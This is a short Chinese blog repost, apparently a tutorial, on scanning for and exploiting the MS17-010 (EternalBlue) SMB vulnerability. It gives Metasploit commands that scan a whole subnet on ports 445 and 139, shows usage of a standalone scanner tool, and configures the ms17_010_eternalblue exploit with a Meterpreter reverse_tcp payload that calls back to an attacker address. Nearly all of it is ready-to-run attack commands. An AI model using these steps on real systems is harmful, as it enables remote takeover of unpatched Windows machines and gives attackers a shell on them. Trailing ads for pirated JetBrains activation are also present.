大家好,又见面了,我是你们的朋友全栈君。
安装一些依赖:
dpkg --add-architecture i386 && apt-get update && apt-get install wine32
rm -r ~/.wine
wine cmd.exe
exit
漏洞扫描一:
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.0.1-192.168.0.254
set ShowProgress false
set ConnectTimeout 5
set threads 16
services -r tcp -p 445 -R
run
扫139端口的话
set SMBDirect false
set RPORT 139
或者
unset SMBDirect
set RPORT 139
漏洞扫描二:
$ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out
指定目标主机列表(每行一个目标):
$ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out
该漏洞可以通过139/TCP利用,不限于445/TCP:
$ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out -p 139
$ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out -p 139
如果不指定"-o scan.out",向stdout输出
-q
只显示vulnerable主机,否则将显示safe、unknown等其他主机
-m
实时显示当前扫描目标,可以不指定
漏洞扫描三:
http://www.freebuf.com/sectool/134657.html
漏洞利用一:
gem install ruby_smb
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.0.160
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.0.86
漏洞利用二:
http://www.freebuf.com/articles/system/133853.html
参考文章:
http://www.freebuf.com/sectool/134657.html
http://scz.617.cn/windows/201706221521.txt
http://scz.617.cn/windows/201707031558.txt
转载于:https://www.cnblogs.com/whoami101/p/7151214.html
发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/133106.html原文链接:https://javaforall.cn
【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛
【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...